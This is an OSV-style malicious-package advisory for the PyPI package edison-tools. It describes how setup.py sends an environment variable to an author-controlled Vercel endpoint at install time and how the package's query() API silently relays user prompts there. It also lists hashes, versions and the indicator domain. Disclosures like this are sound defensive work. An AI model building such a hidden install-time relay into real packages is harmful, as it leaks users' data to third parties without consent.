{"id":"MAL-2026-4747","summary":"Malicious code in edison-tools (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (c151a181047e12f1de0e91b1923861446b04558028d518e30df1767ccc85def7)\nAt `pip install` time, setup.py reads the `EDISON_QUERY` environment variable from the installer's environment and POSTs it to `https://edison-k8.vercel.app/query`, an author-controlled Vercel endpoint that proxies requests to Google Gemini. The HTTP response is written verbatim into `edison_tools/data.py` and exposed through the package's public `query()` API. Two distinct installer-side harms: (1) install-time outbound network with no opt-in, carrying any value the user has placed in `EDISON_QUERY` to the author's infrastructure; (2) the advertised `query()` function silently relays caller-supplied prompts through the author's hardcoded Vercel endpoint, meaning every consumer of the API funnels their queries (and any sensitive content therein) through the author's account, where they can be logged or modified. The destination, model selection, and account credentials are not configurable — the relay is the package's only mechanism. This matches the silent-relay pattern: normal use of the documented API leaks caller-supplied data to a hardcoded third-party destination.\n","modified":"2026-05-27T00:32:10.042268286Z","published":"2026-05-25T22:32:48Z","withdrawn":"2026-05-26T21:29:31Z","database_specific":{"malicious-packages-origins":[{"versions":["0.1.16"],"sha256":"6cd7720e280f30a1f1bd0abcf852773433c1b7b5dea2644f0115d26c6b32c1c6","import_time":"2026-05-26T05:53:17.070203319Z","source":"amazon-inspector","id":"IN-MAL-2026-004789","modified_time":"2026-05-25T23:02:46Z"},{"versions":["0.1.15"],"import_time":"2026-05-26T05:53:17.493092876Z","sha256":"9beb62fe1d724d01013dd33f1a9a81c6f7ba2633a743f2d309255a5db6f9c47a","id":"IN-MAL-2026-004793","source":"amazon-inspector","modified_time":"2026-05-25T23:02:50Z"},{"versions":["0.1.13"],"sha256":"a3ad372a3654885f96211b8b52f6ccfbd175eb1e058d80298510977cc9a58a40","import_time":"2026-05-26T05:53:16.41905842Z","source":"amazon-inspector","id":"IN-MAL-2026-004783","modified_time":"2026-05-25T22:32:48Z"},{"versions":["0.1.22"],"sha256":"a4253ecedd23f08a9811050e2e9baf04b4b286ab4d7f8502dd78f98d989dae07","import_time":"2026-05-26T05:53:18.036253437Z","source":"amazon-inspector","id":"IN-MAL-2026-004798","modified_time":"2026-05-25T23:32:53Z"},{"versions":["0.1.13"],"import_time":"2026-05-26T05:53:16.530048546Z","sha256":"b9a1d7c28c03b928aed4a199fa84be49c9738b20af4046bbbcafdc0c0e067359","id":"IN-MAL-2026-004784","source":"amazon-inspector","modified_time":"2026-05-25T22:32:48Z"},{"versions":["0.1.17"],"sha256":"c151a181047e12f1de0e91b1923861446b04558028d518e30df1767ccc85def7","import_time":"2026-05-26T05:53:17.166888816Z","id":"IN-MAL-2026-004790","source":"amazon-inspector","modified_time":"2026-05-25T23:02:48Z"},{"versions":["0.1.15"],"import_time":"2026-05-26T05:53:17.35598976Z","sha256":"d65d9f3a130fab5042590792c7f1188d89f651a80d7900f3ef06c763fbed2ec5","id":"IN-MAL-2026-004792","source":"amazon-inspector","modified_time":"2026-05-25T23:02:50Z"},{"versions":["0.1.16"],"sha256":"daf5c6af6e8e5d7fc4d418fdb27cf3dc4282cb1b8783fb2788948fce9cf046fe","import_time":"2026-05-26T05:53:16.97779052Z","source":"amazon-inspector","id":"IN-MAL-2026-004788","modified_time":"2026-05-25T23:02:45Z"},{"versions":["0.1.17"],"sha256":"9a53a5b561428a99d075d87fb1844c5ded02b566e9feb2b7ad442d0ff4c5d729","import_time":"2026-05-26T05:53:17.262351437Z","id":"IN-MAL-2026-004791","source":"amazon-inspector","modified_time":"2026-05-25T23:02:48Z"}]},"references":[{"type":"PACKAGE","url":"https://pypi.org/project/edison-tools/0.1.13/"},{"type":"PACKAGE","url":"https://pypi.org/project/edison-tools/0.1.22/"},{"type":"PACKAGE","url":"https://pypi.org/project/edison-tools/0.1.17/"},{"type":"PACKAGE","url":"https://pypi.org/project/edison-tools/0.1.15/"},{"type":"PACKAGE","url":"https://pypi.org/project/edison-tools/0.1.16/"}],"affected":[{"package":{"name":"edison-tools","ecosystem":"PyPI","purl":"pkg:pypi/edison-tools"},"versions":["0.1.16","0.1.15","0.1.13","0.1.22","0.1.17"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/pypi/edison-tools/MAL-2026-4747.json","indicators":{"evidence_files":[{"path":"setup.py","sha256":"412d7e6db4fad778fab0a18dc8a4c6f5811c09e31ead1a17433cec84fb42d0dd","tlsh":"9e11020a40a31870e9e7d7f5847b35913522e9173e04b45c78de16d40f4f065a653495"},{"path":"PKG-INFO","sha256":"31bd0bcea6def6150b6766a474d63b49e1b473c256c3567f5848d26f9de42a6f","tlsh":"1a90020092116071c4299a8700588744c2f41b4675ae14bd88575ed1938b14c6050130"}],"domains":["edison-k8.vercel.app"],"package_integrity":[{"hashes":{"sha256":"fb0586998ac14514648bc76674e4218830be8b5a82364eda5570a569f808566d","md5":"922b470796d9a71a51aa59a6eecefb8c","blake2b_256":"9a2dd7b3c26d193852bd561beb3996ebce7024745dd2cbcd9c9a0e1a40cc031f"},"filename":"edison_tools-0.1.13-py3-none-any.whl"},{"hashes":{"sha256":"d491422733f32efb3f723dd1778b12f8d39103284e56aaed675a9d7a39ba9166","md5":"74c037e253c2e336c45ec58ffa97c408","blake2b_256":"51af07199677b642434aab60a684cb862d3dd44c5c6127e77d5879614131505a"},"filename":"edison_tools-0.1.13.tar.gz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}